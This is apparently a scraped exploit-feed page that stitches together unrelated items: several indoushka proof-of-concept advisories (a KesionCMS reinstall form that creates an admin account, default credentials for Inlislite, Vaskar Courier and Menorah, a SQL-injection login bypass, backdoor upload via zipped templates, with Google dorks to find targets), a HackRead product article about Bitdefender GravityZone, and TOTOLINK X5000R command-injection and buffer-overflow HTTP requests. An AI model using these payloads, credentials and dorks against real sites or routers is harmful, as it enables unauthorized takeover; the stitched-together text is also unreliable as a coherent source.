KesionCMS ASP version 9.5 suffers from an add administrator vulnerability.

====================================================================================================================================  
| # Title     : KesionCMS ASP v9.5 Reinstall Add Admin Exploit                                                                     |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 105.0.(32-bit)                                             |   
| # Vendor    : https://www.kesion.com/                                                                                            |    
| # Dork      : Powered by KesionCMS                                                                                               |  
====================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] copy & past this exploit listed below into a text file and save it with ".html" extension

[+] at Line 09 & 16 change the domain name of target .

[+] The infected folder is /install/  
    This is due to direct unauthorized access to the fourth stage (?action=s4)of the script installation  
    The fourth stage (?action=s4)is responsible for configuring the setting of the site administrator.   
  For this, the vulnerability can be exploited through the direct link or using the exploitation written below

[+] Exploit

    <head><title>  
            Hacked By indoushka  
        </title><link href="http://www.tzxdcpv.com/install/images/guide.css" rel="stylesheet" />  
        <script src="http://www.tzxdcpv.com/ks_inc/jquery.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/common.js" type="text/javascript"></script>  
    <script src="http://www.tzxdcpv.com/ks_inc/lhgdialog.js"></script>  
        </head>  
        <body>    
 <form name="form" method="post" action="http://www.target.127.0.0.1/install/index.asp" id="form">  
        <div class="guide">  
         <div class="guidetitle">  
                </div>  
                <div class="clear"></div>  
              </div>  
          <div class="clear"></div>  
 <input type="hidden" name="action" value="http://www.target.127.0.0.1/install/?action=s5"  />  
       <input type="hidden" name="DBlx" value=""  />  
       <input type="hidden" name="CkbData" value=""  />

              <input type="hidden" name="TxtDBName_a" value=""  />  
       <input name="TxtDBService" value="" id="TxtDBService" class="text" type="hidden"  />  
       <input name="TxtDBName" value="" id="TxtDBName" class="text" type="hidden" />  
       <input name="TxtDBUser" value="" id="TxtDBUser" class="text" type="hidden" />  
       <input name="TxtDBPass" value="" id="TxtDBPass" class="text" type="hidden"  />

      <div id="http://www.target.127.0.0.1/install/?action=s4">

           </div>  
     <div class="clear"></div>  
     <div class="sjlist">  
      <h5>网站参数配置</h5>  
      <ul>  
        <li><span>网站名称：</span><input name="TxtSiteName" value="科兴网络开发" id="TxtSiteName" class="text" type="text"><font color="red">*</font> 如：Kesion官方站</li>  
        <li><span>网站域名：</span><input name="TxtSiteUrl" value="http://cxsecurity.com" id="TxtSiteUrl" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        如http://www.kesion.com。  
        </li>  
        <li><span>安装目录：</span><input name="TxtInstallDir" value="/" id="TxtInstallDir" class="text" type="text"><font color="red">*</font> 后面不要带“/”。   
        系统会自动获取，建议不要修改。  
        </li>  
        <li><span>授 权 码：</span><input name="TxtSiteKey" value="0" id="TxtSiteKey" class="text" type="text">  
        免费版本用户请留空或填“0”。  
        </li>  
        <li><span>后台目录：</span><input name="TxtManageDir" value="Admin/" id="TxtManageDir" class="text" type="text"><font color="red">*</font> 如：Manage,Admin，后面必须带"/"符号。</li>  
                <li><span> 后台登录验证码：</span>  
                 <input type="radio" name="isCode_a" value="True"  /> 启用    
                 <input type="radio" value="False"  name="isCode_a" checked="checked"/> 不启用  
                </li>

                       <li><span>管理认证码：</span>  
                 <input type="radio" name="isCode" value="True" onclick="$('#rzm').show()"/> 启用  <input onclick="$('#rzm').hide()" type="radio" value="False"  name="isCode" checked="checked"   /> 不启用   
                <font id="rzm" style="display:none">认证码：<input name="TxtManageCode" value="8888"  id="TxtManageCode" class="text" style="width:100px;" type="text"></font></li>  
      </ul>  
      <div class="clear"></div>  
      <h5>填写管理员信息</h5>  
      <ul>  
        <li><span>管理员账号：</span><input name="TxtUserName" value="admin"  id="TxtUserName" class="text" type="text"><font color="red">*</font> </li>  
        <li><span>管理员密码：</span><input name="TxtUserPass" value="admin888" id="TxtUserPass" class="text" type="text"><font color="red">*</font> 管理员密码不能为空</li>  
        <li><span>重复密码：</span><input name="TxtReUserPass" value="admin888" id="TxtReUserPass" class="text" type="text"></li>  
      </ul>  
      <div class="clear blank10"></div>

            <div style="padding:5px">  
      <input name="Button1" value="下一步" onClick="return(doCheck());" id="Button1" class="btnbg" type="submit">  
      </div>  
    </div>

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

KesionCMS ASP 9.5 Add Administrator

Inlislite version 3.1 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Inlislite V3.1 Insecure Settings Vulnerability                                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit)                                              | | # Vendor    : https://inlislite.perpusnas.go.id/?read=installerphp                                                               |  | # Dork      : Inlislite V3.1 © 2017 - 2018                                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=inlislite & pass=inlislite= or user=superadmin & pass=superadmin[+] https://127.0.0.1.online/backend/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Inlislite 3.1 Insecure Settings

Biig Order version 2 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ================================================================================| # Title     : E-commerce Biig Order CMS V2 Auth by Pass Vulnerability        || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "shop_detail.php?detail="                                      |================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : User & Pass : ' or 0=0 #[+] https://127.0.0.1/www/biigorder.com/admin/manage-order.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Biig Order CMS 2 SQL Injection

Menorah Restaurant version 1.0.0 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Menorah Restaurant - Restaurant Food Ordering System Reinstall script Vulnerability                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://codecanyon.net/item/menorah-restaurant-restaurant-food-ordering-system/23180351                            |  | # Dork      : "Menorah Restaurant . All Rights Reserved."                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /install/loading_website/ ( Load default db contain the demo user and pass )[+] https://127.0.0.0.1/e-catering.terantrindotama/install/loading_website/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Menorah Restaurant 1.0.0 Insecure Settings

Acelle Email Marketing version 1.0 suffers from an arbitrary file upload vulnerability.

    ====================================================================================================================================| # Title     : Acelle Email Marketing v3.0.15 unrestricted file uploads Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/acelle-email-marketing-web-application/17796082                                        |  | # Dork      : ". Acelle Email Marketing Application by acellemail.com"                                                           |====================================================================================================================================poc :[+]  Unrestricted file uploads You can upload malicious files in compressed format[+]  Dorking İn Google Or Other Search Enggine .[+]  chose web site and singup .[+]  go to templates : https://127.0.0.1/demoacellemailcom/admin/templates or https://127.0.0.1/demoacellemailcom/templates[+]  Zip your backdoor And upload it.        Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |                                                                                                                                      |=======================================================================================================================================

Acelle Email Marketing 3.0.15 Arbitrary File Upload

By Habiba Rashid
According to Bitdefender, GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.
This is a post from HackRead.com Read the original post: Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Bitdefender has launched GravityZone Security for Mobile, a next-generation mobile security solution designed to provide organizations with advanced Mobile Threat Detection (MTD) and robust security measures for Android, iOS, and Chromebook devices.

From communication and banking to entertainment and productivity, smartphones have become integral to our daily lives. However, this increasing reliance on mobile devices has also made them lucrative targets for cybercriminals.

According to the 2023 “Market Guide for Mobile Threat Defense” report by Gartner®, recent cyber attacks have shown the involvement of mobile devices at various stages, emphasizing the critical need for advanced mobile threat detection solutions.

**Bitdefender Introduces GravityZone Security**

Bitdefender’s GravityZone Security for Mobile is a cutting-edge solution that leverages powerful antimalware technologies driven by real-time threat intelligence and machine learning.

This unique combination enables the detection and mitigation of both known and unknown mobile threats. By providing application vetting, device status monitoring, and protection against malicious apps and phishing attacks, GravityZone Security for Mobile significantly enhances the overall security posture of mobile devices.

**Proactively Defending Against Network-Based Threats**

One major vulnerability faced by mobile phones is network-based threats. GravityZone Security for Mobile helps organizations detect and respond to these threats, including reconnaissance attempts and man-in-the-middle attacks. By mapping tactics and techniques used in security evaluations, this solution offers a proactive defence against sophisticated attacks specifically targeted at the mobile channel.

**Comprehensive Device Assessments for Strengthening Mobile Security**

Mobile device vulnerabilities pose significant risks to organizations. GravityZone Security for Mobile conducts comprehensive device assessments, monitoring for missing encryption, jailbreaking, root access, and outdated devices. This proactive approach enables organizations to identify and address vulnerabilities promptly, bolstering their mobile security.

**Seamless Integration and Centralized Management**

Integration with existing security solutions is vital for comprehensive protection. GravityZone Security for Mobile seamlessly integrates with the unified Bitdefender GravityZone console, allowing organizations to manage mobile security alongside other endpoint security solutions. This integration extends security beyond traditional endpoints, simplifying the overall security infrastructure and enabling centralized management.

**Cloud-Based and User-Friendly Approach**

With a cloud-based and user-friendly approach, GravityZone Security for Mobile ensures easy deployment and management for organizations with mobile workforces. Its zero-touch enrollment feature streamlines mass deployments of mobile devices, enhancing security without burdening end-users.

**Meeting Regulatory Compliance Standards**

Regulatory compliance is a top concern for organizations in regulated industries. GravityZone Security for Mobile provides real-time visibility, enabling application vetting, detecting abnormal app behaviour, and enforcing application version control. By facilitating user warnings, isolating risky applications, and taking necessary actions, organizations can meet privacy and security standards more effectively.

**Conclusion:**

As the mobile threat landscape continues to evolve, organizations must enhance their mobile phone security. Bitdefender’s GravityZone Security for Mobile offers a comprehensive solution that effectively tackles mobile threats head-on.

By leveraging advanced technology, proactive defense mechanisms, and seamless integration, organizations can ensure the security and privacy of their mobile devices, safeguarding their operations from evolving cyber threats.

**RELATED ARTICLES**

1.  Ankr Launches Chainscanner Blockchain Explorer Tool
2.  Memcyco Introduces Real-Time Solution to Combat Brandjacking
3.  Mobile Security Firm Cirotta Launches Anti-Hacking Phone Cases
4.  ProtonVPN launches extensions for Chrome and Firefox browsers
5.  Microsoft launches Linux memory forensics tool to detect malware

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Bitdefender Introduces GravityZone Security for Android, iOS, and Chromebook

Apple Zeed ALL YOUR STYLE CMS version 2.0 suffers from a remote SQL injection vulnerability.

    ========================================================================================| # Title     : Apple Zeed ALL YOUR STYLE CMS 2.0 SQL injection Vulnerability          || # Author    : indoushka                                                              || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 109.0(64-bit)  | | # Vendor    : https://www.applezeed.com/web-creative-package-all-your-style.php      |  | # Dork      : Power BY applezeed.com                                                 |    ========================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : tour-detail.php?id=4435[+] https://127.0.0.1/https/biggestjoy.com/tour-detail.php?id=4435 <==== inject here Greetings to :=============================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*|        ===========================================================================================

Apple Zeed ALL YOUR STYLE CMS 2.0 SQL Injection

Vaskar Courier version 3.2.0 appears to leave default credentials installed after installation.

    ================================================================================| # Title     : Vaskar Courier Version 3.2.0 Insecure Settings Vulnerability   || # Author    : indoushka                                                      || # Tested on : windows 10 Fr(Pro) / browser : firefox 113.0.1(64 bits)        | | # Vendor    : https://www.vaskar.in/                                         |  | # Dork      : "Designed and Developed by Vaskar Web"                         |================================================================================poc :[+] The vulnerability is about leaves a default set of administrative credentials installed post installation.[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user = admin & pass= 123 [+] https://127.0.0.1/geetanjalicourier.com/admin/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet |===================================================================================================

Vaskar Courier 3.2.0 Insecure Settings

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contains a command insertion vulnerability in setDiagnosisCfg.This vulnerability allows an attacker to execute arbitrary commands through the "ip" parameter.

TOTOLINK X5000R (V9.1.0u.6118\_B20201102)was found to contain a command insertion vulnerability in setDiagnosisCfg.This vulnerability allows an attacker to execute arbitrary commands through the "ip" parameter.

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 96
    Origin: http://192.168.3.2
    Connection: close
    Referer: http://192.168.3.2/advance/diagnosis.html?time=1679123070237
    Cookie: SESSION_ID=2:1679122532:2
    
    {"ip":"127.0.0.1 -w 2; ls > /tmp/1.txt; ping 127.0.0.1 ","num":"2","topicurl":"setDiagnosisCfg"}
    

Finally, you can write exp to get a stable root shell without authorization.

CVE-2023-33487: vuln/TOTOLINK/X5000R/4 at main · Kazamayc/vuln

TOTOLINK X5000R V9.1.0u.6118_B20201102 and V9.1.0u.6369_B20230113 contains a post-authentication buffer overflow via parameter sPort/ePort in the addEffect function.

**Firmware has a stack overflow vulnerability****Overview**

*   Manufacturer's website information：https://www.totolink.net/
*   Firmware download address ：https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/218/ids/36.html
*   Version ：TOTOLINK X5000R V9.1.0u.6118\_B20201102、TOTOLINK X5000R V9.1.0u.6369\_B20230113

**Product Information**

**Analyse**

Note that the value of addEffect needs to be changed to 1, otherwise the subsequent overflow cannot be triggered.

The sprintf function did not check the length of the data, leading to an overflow.

In order to reproduce the vulnerability, the following steps can be followed:

1.  Boot the firmware by qemu-system or other ways (real machine)
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.3.2
    User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux aarch64; rv:109.0) Gecko/20100101 Firefox/111.0
    Accept: application/json, text/javascript, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Requested-With: XMLHttpRequest
    Content-Length: 578
    Origin: http://192.168.3.2
    Connection: closec
    Referer: http://192.168.3.2/advance/ipf.html?time=1679385965794
    Cookie: SESSION_ID=2:1679385944:2c
    
    {"enable":"1","addEffect":"1","topicurl":"setIpPortFilterRules","sPort":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"}
    

As shown in the figure above, we can hijack PC registers.

Finally, you can write exp to get a stable root shell without authorization.

Tag

#firefox